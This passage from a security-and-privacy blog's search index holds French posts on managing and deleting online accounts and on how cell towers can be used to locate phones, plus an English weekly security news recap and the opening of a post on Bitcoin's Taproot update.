vos banques, le numéro C pour les choses sans rapport avec votre adresse/vrai nom, comme les réservations de restaurants Beaucoup de services vous offrent la possibilité de vous connecter via un tiers, comme Google ou votre Apple ID. Vous devriez l\u0026rsquo;éviter, non seulement pour des raisons de vie privée mais aussi parce que perdre l\u0026rsquo;accès à votre compte Google signifiera perdre l\u0026rsquo;accès à un tas d\u0026rsquo;autres comptes Des données aussi simples qu\u0026rsquo;une photo de profil peuvent être utilisées pour trouver d\u0026rsquo;autres comptes que vous possédez Surveillance et gestion des enregistrements # Une fois que vous avez créé votre compte, vous devriez l\u0026rsquo;enregistrer correctement dans un gestionnaire de mots de passe. Non seulement parce que c\u0026rsquo;est une bonne pratique en matière de sécurité, mais aussi parce que cela vous permettra de surveiller à qui vous avez donné quelles informations.\nUne chose que je fais personnellement est de créer des tags pour les différentes adresses et numéros de téléphone que j\u0026rsquo;utilise (en plus des catégories selon l\u0026rsquo;identité). Chaque fois que j\u0026rsquo;utilise l\u0026rsquo;un d\u0026rsquo;entre eux avec un compte, j\u0026rsquo;ajoute le tag à son entrée. Cela me permet de :\nSavoir quelles informations identifiables j\u0026rsquo;ai données à un service, donc si celui-ci est piraté, je sais que cette information est disponible dans la nature Si je change de numéro de téléphone ou autre, je sais quels comptes je dois mettre à jour Je sais quels comptes peuvent être liés entre eux par un tiers En plus des tags, j\u0026rsquo;ai un autre champ pour entrer la date d\u0026rsquo;expiration prévue. Je passe souvent en revue mes comptes triés par cette date pour trouver les comptes que je veux supprimer. Nous discuterons de quelques bonnes pratiques de suppression de comptes dans la partie suivante, mais mon point est que vous devriez toujours essayer de supprimer vos comptes quand ils deviennent inutiles (ou même - selon le compte - régulièrement pour éviter de stocker trop de données dedans. Par exemple, si vous utilisez Uber Eats, un nouveau compte chaque fois que vous déménagez est une bonne chose) de cette façon, vous réduisez l\u0026rsquo;exposition de vos informations personnelles.\nEnfin, et je n\u0026rsquo;entrerai pas dans les détails dans cet article, vous voudrez peut-être aussi envisager d\u0026rsquo;utiliser des services comme haveibeenpwned et de régulièrement vous googler pour vérifier quelles informations privées peuvent être trouvées en ligne.\nSuppression de comptes # Cette partie pourrait aussi avoir son propre article dédié car il y a beaucoup de choses à dire, mais je vais essayer de résumer les points les plus importants.\nDe nos jours, grâce au RGPD et aux lois similaires, beaucoup de sites web offrent une option pour supprimer votre compte par vous-même, ou au moins une adresse e-mail à contacter pour demander la suppression. C\u0026rsquo;est bien, mais pas toujours parfait. Par exemple :\nCertains forums supprimeront votre compte, mais ne supprimeront pas vos messages. À la place, ils les afficheront simplement comme postés par \u0026ldquo;Anonyme\u0026rdquo; ou quelque chose du genre, mais s\u0026rsquo;ils contenaient des informations personnelles, celles-ci seront toujours là Certains sites web ne feront techniquement que désactiver votre compte, de sorte qu\u0026rsquo;il n\u0026rsquo;est pas visible pour les utilisateurs, mais les informations sont toujours dans la base de données Certaines informations (principalement liées à la facturation) doivent légalement être conservées pour se conformer à la loi, donc il ne sera pas possible de les faire supprimer Tout cela pour dire que lorsque vous supprimez un compte, vous devriez essayer autant que possible de supprimer les données par vous-même d\u0026rsquo;abord. Modifiez puis supprimez vos messages manuellement, entrez un faux numéro de téléphone, changez votre pseudonyme, \u0026hellip; et ensuite, supprimez le compte.\nParfois, il est difficile de savoir où aller pour faire supprimer vos informations. Ces deux sites web listent les procédures pour un bon nombre de services en ligne :\nhttps://www.accountkiller.com/en/home https://backgroundchecks.org/justdeleteme/ Crédits # Photo d\u0026rsquo;en-tête par Glenn Carstens-Peters sur Unsplash\n","date":"2022-05-01","externalUrl":null,"permalink":"/fr/posts/2022/online-accounts-hygiene-and-management/","section":"Articles","summary":"Vous avez des dizaines de comptes, c’est beaucoup d’informations que vous mettez sur Internet. Voyons comment gérer vos comptes en ligne et votre vie privée","title":"Hygiène et gestion des comptes en ligne","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSi nous parlons de localiser quelqu\u0026rsquo;un à l\u0026rsquo;aide de son téléphone, vous penseriez probablement à une scène vue dans un film où la police tente de retrouver un preneur d\u0026rsquo;otages pendant qu\u0026rsquo;il appelle pour demander une rançon. Mais saviez-vous que ce n\u0026rsquo;est pas la seule utilisation de la localisation par antennes-relais ? En fait, marcher dans la rue avec votre téléphone allumé produira un certain niveau de journaux de localisation. Cela pourrait même être utilisé par les autorités, comme à Taïwan pour traquer les personnes ne respectant pas la quarantaine obligatoire pendant la crise du Covid (voir cet article). Si vous pensez que vous n\u0026rsquo;êtes pas concerné, détrompez-vous. Un suivi similaire est également d\u0026rsquo;actualité dans les pays occidentaux.\nDans l\u0026rsquo;article d\u0026rsquo;aujourd\u0026rsquo;hui, nous présenterons comment fonctionne le réseau cellulaire, quel type de données est collecté et comment ces données peuvent être utilisées pour vous localiser.\nTechnologies de communication mobile et ondes radio # Le réseau mobile utilise des signaux radio pour permettre à ses différents composants (antennes-relais et appareils mobiles) de communiquer ensemble. Dans cette partie, nous passerons rapidement en revue les différentes technologies utilisées et certaines des techniques qui permettent à plusieurs appareils de communiquer ensemble sans causer d\u0026rsquo;interférences.\nNormes de réseau # Il existe différentes générations de normes de réseaux téléphoniques. En fait, si vous possédez un téléphone, vous en avez entendu parler : c\u0026rsquo;est la « 4G » que vous voyez la plupart du temps à côté de vos barres de signal.\nRéseaux de 1ère génération (1G) # La 1G a été créée en 1984. C\u0026rsquo;était un système analogique permettant uniquement le transfert de voix. Elle est désormais obsolète et n\u0026rsquo;est plus utilisée.\nRéseaux de 2ème génération (2G) # La 2G a été introduite en 1991. Elle est désormais obsolète également, mais est encore utilisée aujourd\u0026rsquo;hui. La 2G introduit des signaux codés numériquement (par rapport aux signaux analogiques précédents) et la possibilité d\u0026rsquo;envoyer des messages texte et d\u0026rsquo;utiliser Internet. Certaines des normes qu\u0026rsquo;elle utilise sont :\nGSM (Global System for Mobile) était le premier système 2G. Il ne permettait pas l\u0026rsquo;accès à Internet, mais il était possible d\u0026rsquo;utiliser les messages SMS GPRS (General Packet Radio Service) est une amélioration du GSM. Il permet de se connecter à Internet et d\u0026rsquo;envoyer/recevoir des messages MMS. On le désigne parfois comme la 2.5G. EDGE (Enhanced Data Rates for GSM Evolution) a été introduit en 2003, et constitue l\u0026rsquo;évolution finale de la 2G, considérée comme pré-3G. C\u0026rsquo;est une amélioration de la norme précédente et permet une transmission de données jusqu\u0026rsquo;à 473 kbps. Les technologies utilisées par la 2G pour gérer l\u0026rsquo;accès au canal radio sont les suivantes (nous en parlerons plus en détail plus tard) :\nTDMA (Time Division Multiple Access) FDMA (Frequency Division Multiple Access) CDMA (Code-Division Multiple Access - uniquement avec EDGE) Réseaux de 3ème génération (3G) # La 3G a été introduite en 2000 et permet des transferts de données plus rapides que ses prédécesseurs. Elle utilise le W-CDMA (Wideband CDMA) et permet un débit de données allant jusqu\u0026rsquo;à 2 Mbps en stationnaire et 144 kbps en voiture.\nComme pour la 2G, la 3G a connu de multiples améliorations visant à améliorer ses performances :\nHSDPA (High-Speed Downlink Packet Access), également connu sous le nom de 3.5G, permet jusqu\u0026rsquo;à 14 Mbps en descendant et 2 Mbps en montant HSUPA (High-Speed Uplink Packet Access), également connu sous le nom de 2.75G, augmente le débit montant jusqu\u0026rsquo;à 2,8 Mbps HSPA+ (Evolved High-Speed Packet Access) supporte jusqu\u0026rsquo;à 168 Mbps en descendant et 22 Mbps en montant LTE - pré-4G mais commercialisé comme 4G # LTE (3G Partnership Project - Long Term Evolution) est un système pré-4G qui offre des performances accrues par rapport à la 3G mais n\u0026rsquo;atteint toujours pas le plein potentiel de la 4G. Il peut offrir jusqu\u0026rsquo;à 300 Mbps en descendant et 75 Mbps en montant et améliore la transmission de données en mouvement en remplaçant le CDMA par l\u0026rsquo;OFDMA (Orthogonal Frequency-Division Multiple Access).\nLe LTE ne supporte pas les appels vocaux, donc la 2G, la 3G ou le voLTE sont utilisés lorsque nécessaire.\nFréquences des réseaux # Nous avons mentionné que dans les réseaux cellulaires, les données sont échangées par ondes radio. Selon la technologie utilisée, les fréquences disponibles sont différentes. Par exemple, la 3G peut fonctionner sur les bandes 800, 850, 900, 1 700, 1 900 et 2 100 MHz tandis que le GSM ne supporte que les bandes 850, 900, 1 800 et 1 900 MHz. Selon le pays, il est également possible que toutes les bandes disponibles ne soient pas utilisées.\nEn général, les fréquences plus élevées transfèrent les données plus rapidement mais sur une portée plus courte, tandis que les fréquences plus basses transportent les données sur de plus longues distances mais plus lentement.\nMéthodes d\u0026rsquo;accès au canal # Nous avons précédemment mentionné FDMA, TDMA, CDMA et OFDMA. Maintenant que nous avons aussi parlé des fréquences, nous pouvons entrer dans plus de détails sur ce qu\u0026rsquo;ils font.\nCes acronymes sont des méthodes d\u0026rsquo;accès au canal utilisées par les technologies radio. Imaginez que vous avez plusieurs terminaux envoyant des données sur la même fréquence radio ; si rien n\u0026rsquo;est fait, les données vont simplement entrer en collision et un appareil écoutant ce canal radio ne comprendrait rien. Les méthodes d\u0026rsquo;accès au canal visent à résoudre ce problème.\nFDMA # Le Frequency Division Multiple Access va diviser la bande passante disponible en plusieurs canaux non chevauchants qu\u0026rsquo;il attribuera aux appareils connectés. Par exemple, si nous avons une tour utilisant une bande passante B et deux appareils connectés, l\u0026rsquo;appareil 1 se verra attribuer les premiers 200 KHz, les 50 MHz suivants seront non attribués pour éviter le chevauchement, et l\u0026rsquo;appareil 2 se verra attribuer les 200 MHz suivants. De cette façon, tous les appareils peuvent communiquer en même temps et la tour peut distinguer leur trafic.\nTDMA # Le Time Division Multiple Access nécessite plus de synchronisation entre les appareils. Tous les appareils utilisant une tour pourront utiliser toute la bande passante, mais ils auront un créneau horaire spécifique pendant lequel ils sont autorisés à communiquer, il est donc important que leurs horloges soient strictement les mêmes.\nCDMA # Avec les techniques de Code Division Multiple Access, tous les appareils peuvent transmettre des données en même temps sur la même fréquence. Chaque appareil utilise une séquence de code spécifique lors de la transmission de données, ce qui permet de distinguer les différents signaux. La principale différence entre le CDMA et le W-CDMA est que ce dernier supporte une bande passante plus large.\nLe réseau téléphonique # Le réseau téléphonique nécessite plusieurs composants pour être opérationnel. Votre téléphone n\u0026rsquo;interagira directement qu\u0026rsquo;avec les antennes-relais pour envoyer et recevoir des données, mais ces tours utiliseront différents systèmes pour authentifier correctement les appareils et acheminer les appels/données appropriés au bon endroit.\nStations de base émettrices-réceptrices # Les stations de base émettrices-réceptrices (BTS) sont la partie la plus visible du réseau ; ce sont les antennes-relais qui envoient ou reçoivent des signaux radio. Notez qu\u0026rsquo;elles peuvent être appelées « node B » dans les réseaux 3G, « evolved node B » en LTE, ou généralement « station de base ».\nLes stations de base sont généralement installées à des emplacements fixes, mais il est aussi possible d\u0026rsquo;en installer des portables. Cela se produit typiquement lorsque les opérateurs prévoient une concentration de personnes plus importante que d\u0026rsquo;habitude dans une certaine zone, par exemple lors d\u0026rsquo;un concert, et permet au réseau de ne pas être saturé.\nLes stations de base peuvent avoir deux types d\u0026rsquo;antennes :\nLes antennes omnidirectionnelles sont utilisées dans les zones à faible volume de trafic ou pour les petits relais intérieurs et recevront/diffuseront des signaux à 360 degrés. Les antennes sectorielles, qui sont directionnelles. Elles peuvent avoir jusqu\u0026rsquo;à 6 secteurs mais utilisent le plus souvent 3, ce qui signifie qu\u0026rsquo;elles diffuseront/recevront des signaux dans trois zones de 120 degrés. Le schéma suivant montre comment les stations de base cellulaires sont organisées pour créer un réseau. On peut observer qu\u0026rsquo;elles ont toutes une antenne à 3 secteurs et sont placées de manière à ce que le signal puisse être capté partout sur la carte.\nRéseau cellulaire (Source : Wikipedia) Si nous regardons la cellule en haut à droite, nous pouvons voir qu\u0026rsquo;elle est entourée de trois stations de base, qui diffusent sur les fréquences 14, 16 et 1. Si vous étiez avec votre téléphone au milieu de cette cellule, vous pourriez capter les signaux des trois stations.\nLe réseau est conçu de manière à ce que :\nLes entreprises de téléphonie mobile utilisent des fréquences radio différentes pour que leurs tours n\u0026rsquo;interfèrent pas entre elles (les fréquences sont généralement attribuées aux entreprises par des organismes gérés par l\u0026rsquo;État) Les opérateurs téléphoniques configurent leur réseau de manière à ce que les tours adjacentes utilisent des fréquences radio différentes pour ne pas interférer entre elles Contrôleur de station de base (BSC) # Les contrôleurs de station de base peuvent être en charge du contrôle d\u0026rsquo;une ou (le plus souvent) de plusieurs stations de base émettrices-réceptrices (chaque BTS a un seul BSC). Certaines des choses dont ils s\u0026rsquo;occupent spécifiquement sont :\nLa gestion des fréquences radio Les transferts intercellulaires des BTS (c\u0026rsquo;est-à-dire : un appareil est connecté à une BTS, le signal devient faible, il commence à utiliser une autre BTS avec un meilleur signal) L\u0026rsquo;établissement des appels Centre de commutation mobile (MSC) # Les centres de commutation mobile sont connectés à un ou plusieurs BSC (chaque BSC a un seul MSC) et interagiront avec divers systèmes du réseau pour s\u0026rsquo;assurer que les différentes communications sont correctement acheminées. Certaines de leurs tâches sont :\nSe connecter au registre de localisation nominale (HLR) et au registre de localisation des visiteurs (VLR) pour s\u0026rsquo;assurer que les appareils connectés aux stations de base sont autorisés à se connecter, et journaliser leur utilisation d\u0026rsquo;appels/SMS/données afin que les clients puissent être facturés Acheminer les appels, SMS, Internet S\u0026rsquo;interfacer avec le réseau téléphonique commuté public (PSTN) Registre de localisation nominale (HLR) # Le registre de localisation nominale est une base de données contenant des informations relatives aux abonnés mobiles. Il est chargé de savoir si un utilisateur est autorisé à accéder au réseau et quels services il est autorisé à utiliser, de savoir comment acheminer les transmissions vers et depuis les appareils, et comment facturer les clients. Il stockera également la dernière localisation connue des utilisateurs et la mettra à jour si nécessaire.\nPour authentifier les utilisateurs, le HLR stockera les identifiants internationaux d\u0026rsquo;abonnés mobiles (IMSI) qui sont stockés dans les modules d\u0026rsquo;identification d\u0026rsquo;abonnés (cartes SIM).\nRegistre de localisation des visiteurs (VLR) # Le registre de localisation des visiteurs (VLR) est une base de données similaire au HLR. Il peut être utilisé par un ou plusieurs MSC (chaque MSC est connecté à un seul VLR) et stockera temporairement des données relatives aux clients connectés à ses MSC. Il stockera également des données relatives aux utilisateurs en itinérance.\nConnexion des téléphones et sélection de l\u0026rsquo;antenne # Pour résumer certains des éléments que nous avons discutés jusqu\u0026rsquo;ici, voyons ce qui se passe lorsque vous vous promenez avec votre téléphone à l\u0026rsquo;extérieur.\nVotre téléphone va scanner votre environnement pour essayer de trouver des antennes-relais Il se connectera à l\u0026rsquo;antenne-relais ayant le signal le plus fort (sauf si la tour a atteint le nombre maximum de connexions) Lorsqu\u0026rsquo;il se connecte à la BTS, le MSC vérifiera que l\u0026rsquo;utilisateur est autorisé à se connecter en utilisant le HLR et le VLR, et mettra à jour divers enregistrements tels que la localisation du téléphone (quelle BTS il utilise) Une fois connecté, il y aura une connexion full-duplex (FDX) entre le téléphone et la BTS Pendant que vous vous déplacez, le téléphone vérifie toujours quelles tours sont autour et quel signal est le plus fort. Si nécessaire, un transfert intercellulaire peut avoir lieu (c\u0026rsquo;est-à-dire le téléphone utilisera une BTS différente avec un meilleur signal). Ce peut être un transfert dur (la connexion est coupée puis recréée), ou un transfert doux (le processus est transparent et le téléphone est connecté au réseau à tout moment) Si quelqu\u0026rsquo;un essaie de vous appeler, son téléphone interrogera le HLR (via le BSC/MSC) pour savoir quelle BTS vous utilisez, et l\u0026rsquo;appel sera acheminé vers vous grâce à cette information Méthodes de suivi # Maintenant que nous avons fini de présenter le fonctionnement du réseau mobile, il est temps de voir comment il est possible de tirer parti des différentes infrastructures pour suivre les utilisateurs des réseaux.\nLocalisation historique # Nous avons mentionné précédemment que lorsque vous essayez d\u0026rsquo;utiliser le réseau, ses composants vérifieront si vous êtes autorisé à le faire. Les mêmes composants enregistreront également certaines informations sur votre utilisation du réseau. Certaines de ces informations peuvent être conservées pendant quelques années ou moins, selon les politiques de votre opérateur (jusqu\u0026rsquo;à 7 ans pour AT\u0026amp;T aux États-Unis). Dans cette partie, nous discuterons du type d\u0026rsquo;informations stockées et de ce qu\u0026rsquo;on peut en faire.\nRelevés détaillés des appels # Chaque fois qu\u0026rsquo;un appareil mobile passe un appel, les informations sont enregistrées dans les relevés détaillés des appels (CDR), principalement à des fins de facturation (notez que des informations similaires seront également enregistrées pour l\u0026rsquo;activité données et SMS).\nCes relevés incluront les éléments suivants, avec éventuellement quelques variations selon l\u0026rsquo;opérateur réseau :\nLes numéros appelant et appelé La date et l\u0026rsquo;heure de début et de fin Les identifiants des premières et dernières tours utilisées lors de l\u0026rsquo;appel (et le secteur utilisé) L\u0026rsquo;IMSI et l\u0026rsquo;IMEI du téléphone utilisé Ces relevés seront conservés plus ou moins longtemps selon l\u0026rsquo;opérateur réseau (AT\u0026amp;T les conserve pendant 7 ans tandis que Verizon ne les conserve que pendant 1 an).\nPuisque nous ne connaissons que les tours qui ont pris l\u0026rsquo;appel et dans quel secteur, il n\u0026rsquo;est pas possible d\u0026rsquo;utiliser ces données pour obtenir une localisation plus ou moins large. En particulier, la concentration d\u0026rsquo;antennes-relais dépend de l\u0026rsquo;environnement (il y a beaucoup d\u0026rsquo;antennes-relais si vous êtes à Manhattan, beaucoup moins si vous êtes au milieu de la Vallée de la Mort). Une tour pourrait très bien couvrir un rayon de 10 km ou de 100 m.\nVidage de tour # Un vidage de tour désigne les données relatives à l\u0026rsquo;activité d\u0026rsquo;une station de base émettrice-réceptrice spécifique. Il contiendra un journal de toute l\u0026rsquo;activité effectuée via la tour (appels, SMS, \u0026hellip;) mais aussi la liste de tous les appareils connectés à la tour à un moment donné, y compris les connexions passives (comme nous l\u0026rsquo;avons mentionné précédemment, un appareil est toujours connecté à une tour même s\u0026rsquo;il ne fait activement rien).\nPCMD, RTT, NELOS # Jusqu\u0026rsquo;à présent, nous n\u0026rsquo;avons vu que des choses qui permettraient d\u0026rsquo;associer un appareil à une localisation assez large. Dans cette partie, nous mentionnerons des systèmes qui peuvent permettre de localiser un emplacement plus précis (mais encore assez approximatif). Un document d\u0026rsquo;AT\u0026amp;T évalue que sa précision est probablement « meilleure que 100 m » et « meilleure que 10 km » selon les cas.\nPCMD (Per Call Measurement Data) et NELOS (Network Event Location Systems - propriétaire d\u0026rsquo;AT\u0026amp;T) sont des noms différents pour des mécanismes faisant la même chose : puisque nous savons à quelle vitesse les ondes radio se déplacent, les tours mesureront le temps qu\u0026rsquo;il faut pour que les données voyagent entre la tour et les appareils connectés, et calculeront une estimation de la distance du récepteur.\nLes données PCMD sont généralement conservées pour une durée plus courte que les données comme les CDR (typiquement environ une ou deux semaines). Certains opérateurs n\u0026rsquo;auront pas ces données (le PCMD n\u0026rsquo;est utilisable qu\u0026rsquo;avec les réseaux CDMA, mais des choses comme le Timing Advance sont plus ou moins équivalentes), certains les conserveront une semaine, et d\u0026rsquo;autres jusqu\u0026rsquo;à trois mois.\nLes données PCMD ne seront normalement enregistrées que lorsque des transferts de données ont lieu (Internet/Appel/SMS) mais certains opérateurs pourraient avoir des politiques différentes selon le type de données.\nLocalisation en temps réel # Les méthodes que nous avons discutées jusqu\u0026rsquo;à présent sont principalement basées sur les journaux d\u0026rsquo;activité, mais il existe aussi des moyens de suivre un téléphone en temps réel. Le plus courant est la triangulation (mais certains opérateurs comme Sprint offrent aussi des choses comme les pings GPS pour envoyer une requête au téléphone afin qu\u0026rsquo;il retourne sa position GPS actuelle).\nLa triangulation utilisant les mesures de temps d\u0026rsquo;arrivée (TA) et de temps aller-retour (RTT) est une méthode largement supportée par les opérateurs téléphoniques. Elle consiste à faire en sorte que plusieurs tours envoient un ping à un terminal puis mesurent sa distance avec le TA ou le RTT (basé sur le temps qu\u0026rsquo;il a fallu aux ondes radio pour atteindre les appareils).\nLa figure ci-dessous est un exemple de triangulation effectuée par 4 tours. Chaque cercle symbolise la distance calculée depuis une tour, et nous pouvons voir que toutes les distances ont un seul point (rouge) en commun, qui est le terminal que nous voulions localiser. Bien sûr, plus il y a de tours, plus la localisation sera précise, mais le rayon sera probablement de 50 à 100 m au mieux.\nConclusion # Nous avons discuté dans cet article du fonctionnement du réseau téléphonique, de la façon dont il conserve des journaux (et quelles informations ils contiennent), et de la façon dont il est possible de trouver la position d\u0026rsquo;un téléphone en temps réel. Sur cette base, nous pouvons conclure que tant que vous portez un téléphone allumé dans un endroit avec de la connectivité, vous laisserez des traces. La seule solution à ce sujet est de ne pas avoir de téléphone, ou de le garder éteint quand c\u0026rsquo;est possible (réduisant donc considérablement son utilité).\nSi le sujet vous intéresse, vous pouvez consulter les différentes sources listées à la fin de cet article, mais aussi des choses comme les IMSI-catchers (dispositifs d\u0026rsquo;écoute téléphonique).\nSources et ressources supplémentaires # Comparison of mobile phone standards (Wikipedia) Cellular network (Wikipedia) How to Find a Cell Phone Tower Near You (Web Boost) Difference between GSM and GPRS (Geeks for Geeks) Introducing radio spectrum (GSMA) Difference between TDMA and CDMA (Geeks for Geeks) March 2019 FBI CAST Cellular Analysis \u0026amp; Geo-Location Field Resource Guide (FBI) Mobile Networks - Handover (YouTube - Mario Neugabauer) Base Station Controller (BSC) (Techopedia) Mobile Switching Centre (Olivia Wireless) Mobile Switching Center (MSC) (Techopedia) What Is a Mobile Switching Center (MSC)? (Emnify) Home Location Register (HLR) (Olivia Wireless) Visitor Location Register (VLR) (Techopedia) Cellular Analysis for Legal Professionals (Guardian Digital Forensics) CRIMINAL DEFENSE - LOCATION DATA Advanced Cell Site Analysis Using Per Call Measurement Data (IRIS LLC) Scientific Working Group on Digital Evidence (SWGDE) Cell Phone Investigations™ (Aaron Edens Police Technical) Cellular Records Review and Analysis Part 1: AT\u0026amp;T CELLULAR SERVICE PROVIDER (IRIS LLC) CELL-PHONE TECHNOLOGY (Wikieducator) Cellular Provider Record Retention Periods (Forensic Focus) Gotta Catch \u0026lsquo;Em All: Understanding How IMSI-Catchers Exploit Cell Networks (EFF) Crédits images # Photo de couverture par Kabiur Rahman Riyad sur Unsplash ","date":"2021-11-25","externalUrl":null,"permalink":"/fr/posts/2021/cell-towers-how-they-can-be-used-to-track-your-movements-now-and-in-the-past/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nSi nous parlons de localiser quelqu’un à l’aide de son téléphone, vous penseriez probablement à une scène vue dans un film où la police tente de retrouver un preneur d’otages pendant qu’il appelle pour demander une rançon. Mais saviez-vous que ce n’est pas la seule utilisation de la localisation par antennes-relais ? En fait, marcher dans la rue avec votre téléphone allumé produira un certain niveau de journaux de localisation. Cela pourrait même être utilisé par les autorités, comme à Taïwan pour traquer les personnes ne respectant pas la quarantaine obligatoire pendant la crise du Covid (voir cet article). Si vous pensez que vous n’êtes pas concerné, détrompez-vous. Un suivi similaire est également d’actualité dans les pays occidentaux.\n","title":"Antennes-relais : comment elles peuvent être utilisées pour suivre vos déplacements (maintenant et dans le passé)","type":"posts"},{"content":"This week, the Taproot Bitcoin update went live, an Iran based APT is targetting the US and Australia\u0026rsquo;s critical infrastructures, the US DoJ announced that it will sell some cryptocurrencies seized from the Bitconnect scam, and authorities arrested the CEO of an exchange accused to help the Ryuk ransomware gang to launder its profits. Read our 15th weekly news recap to find more.\nThis week\u0026rsquo;s recap covers a shorter period than usual as it only goes up to Thursday news.\nAPT # Taking Action Against Hackers in Pakistan and Syria (Facebook Blog)\nFacebook announced that it disabled accounts and blocked domain names related to four malicious groups (in August and October). One of them originating from Pakistan (SideCopy) is said to be targeting people connected with the previous Afghan government, military and law enforcement in Kaboul. The three other groups are allegedly originating from Syria (linked to the Syrian governmental Air Force Intelligence) and are targeting journalists, humanitarian organizations, and anti-regime forces. Facebook said it warned the owners of the accounts targetted by the attacks.\nUNC1151 Assessed with High Confidence to have Links to Belarus, Ghostwriter Campaign Aligned with Belarusian Government Interests (Mandiant)\nMandiant assessed that UNC1151, an APT involved in cyber-espionage, provided support to the (pro-Russia/anti-NATO) Ghostwriter influence campaign and has some links to the Belarusian government (and possibly its military). The company also said that Russian involvement can\u0026rsquo;t be ruled out, even if there is no direct evidence that they are involved at the moment.\nIranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities (CISA)\nThe US Cybersecurity \u0026amp; Infrastructure Agency issued an advisory stating that an Iran-related APT is actively exploiting Fortinet and Microsoft exchange ProxyShell vulnerabilities since at least March and October this year. US and Australian critical infrastructure sectors (including transportation and health care) are said to be targeted.\nFBI: An APT abused a zero-day in FatPipe VPNs for six months (The Record)\nThe FBI discovered that an APT has been exploiting a 0-day vulnerability affecting FatPipe VPN devices since at least May 2021. The vulnerability allows to \u0026ldquo;gain access to an unrestricted file upload function to drop a web shell for exploitation activity with root access\u0026rdquo;, the FBI said.\nCryptocurrencies # Taproot Soft-Fork: What Does it Bring to Bitcoin? (Ixonae on Security)\nThe Taproot soft fork was enabled on Sunday 14th. It is the first major update to Bitcoin since SegWit in 2017 and ships three Bitcoin Improvement Proposals (BIP340, BIP341, and BIP342) including Schnorr signatures, MAST, and Tapscript.\nSweden Demands the EU Ban Proof of Work Crypto Mining (Darknet Live)\nSweden\u0026rsquo;s General Directors of the Financial Supervisory Authority and of the Environmental Protection Agency asked for proof of work-based cryptocurrencies to be banned from the EU. They argue that “the consumer risks are significant, and crypto-assets are commonly used for criminal purposes [and] have a significant negative impact on the climate as mining leads to both large emissions of greenhouse gases.\u0026quot;\nVictims of $2 billion BitConnect fraud to get back $57 million (Bleeping Computer)\nUS authorities announced that they would start liquidating about USD 67 millions worth of cryptocurrencies seized from the BitConnect scam, and it will use the funds to refund victims. Between 2016 and 2018, BitConnect admins received about USD 2 billion.\nDarknet # An investigation into SS7 Exploitation Services on the Dark Web (SOS Intelligence)\nThe Signaling System 7 is a telecommunications protocol used to define how the various elements of the telephone network exchange information. The protocol is not very secure, and it is possible to intercept and spoof calls and SMS. Researchers found out there are 4 services that are said to offer this kind of service on the dark web but are assessed to be fake. Altogether these websites are estimated to have gained at least a few hundred dollars.\nMisc # Hoax Email Blast Abused Poor Coding in FBI Website (Krebs on Security)\nTaking advantage of flaws in an FBI related website, a hacker managed to send hoax email messages from the FBI\u0026rsquo;s servers and with their domain name fbi.gov. The emails sent claimed that the receivers were subject to a \u0026ldquo;sophisticated chain attack [\u0026hellip; which could] cause server damage to [their] infrastructure.\u0026rdquo;\nIntel confirms two local security issues that affect many Intel processor generations (GHacks)\nIntel published securities advisories related to two critical CVEs which might allow escalation of privileges via local access. Both can be addressed with a BIOS update.\nEmotet botnet returns after law enforcement mass-uninstall operation (The Record)\nEmotet, a botnet used as a Crime-as-a-Service platform by various cyber criminals came back to life recently; ten months after a big international police operation shut it down.\nSecure development: New and improved Linux Random Number Generator ready for testing (The Daily Swig)\nAfter five years of development, the Linux Random Number Generator is ready to be tested as a replacement for /dev/urandom. It offers a 130% performance improvement compared to the existing function and uses several computing functions as a source of entropy.\nUK government publishes guidance on security rules for tech takeovers (The Register)\nThe UK government published new guidelines on what technologies might fall within the National Security and Investment act (passed in January 2021) which gives ministers the power to halt mergers and acquisitions when they present a security risk to the country. There are 17 listed technologies such as advanced materials, AI, computer hardware, or transport.\nPrivacy # Surveillance firm pays $1 million fine after \u0026lsquo;spy van\u0026rsquo; scandal (Bleeping Computer)\nWiSpear, an intelligence company, paid about USD 1 million in fines to the Cyprus authorities. In 2019, the company used a \u0026ldquo;spy van\u0026rdquo; to collect MAC addresses and IMSIs of nearby devices.\nAdult cam site StripChat exposes the data of millions of users and cam models (The Record)\nA researcher discovered a data leak coming from StripChat (one of the Internet\u0026rsquo;s top 5 adult cam sites). Between the 4th and the 7th of November, an unprotected Elastic Search cluster exposed 64 million users data, 410,000 models data, and 134 million transaction information.\n7 million Robinhood user email addresses for sale on hacker forum (Bleeping Computer)\nRobinhood - a trading service - announced last week that it suffered unauthorized access to its systems. About 7 million users personal data (email, full name, date of birth, and zip code) are now on sale for a minimum of \u0026ldquo;5 figures\u0026rdquo; (more than USD 10,000). The seller also claims to have more sensitive information for 310 customers, including some identification cards. This wasn\u0026rsquo;t announced by Robinhood when they made the breach public. The same threat actor is also reportedly behind this week\u0026rsquo;s FBI hack.\nRansomware # US detains crypto-exchange exec for helping Ryuk ransomware gang launder profits (The Record)\nA Russian national and co-founder of two cryptocurrencies exchanges was arrested in the Netherland by the FBI\u0026rsquo;s request after being accused of money laundering. Allegedly, USD 400,000 worth of cryptocurrencies assets passed through one of his accounts in 2018.\nInteresting Reads # Instagram, tricked into thinking its boss was dead, locked him out of his own account (Bitdefender) HTML smuggling surges: Highly evasive loader technique increasingly used in banking malware, targeted attacks (Microsoft Security Blog) Catching Transparent Phish: Analyzing and Detecting MITM Phishing Toolkits Uncovering MosesStaff techniques: Ideology over Money (Checkpoint) SharkBot: a new generation of Android Trojans is targeting banks in Europe (Cleafy) Evolving trends in Iranian threat actor activity - MSTIC presentation at CyberWarCon 2021 (Microsoft) ","date":"2021-11-19","externalUrl":null,"permalink":"/blog/weekly-news-recap-15/","section":"News","summary":"This week, the Taproot Bitcoin update went live, an Iran based APT is targetting the US and Australia’s critical infrastructures, the US DoJ announced that it will sell some cryptocurrencies seized from the Bitconnect scam, and authorities arrested the CEO of an exchange accused to help the Ryuk ransomware gang to launder its profits. Read our 15th weekly news recap to find more.\n","title":"Weekly News Recap 15","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLe soft fork Taproot a finalement été activé le dimanche 14 avec le bloc 709 634. Il s\u0026rsquo;agit de la première mise à jour majeure de Bitcoin depuis SegWit en 2017. Son implémentation a été décidée en juin de cette année (au bloc 687 284) 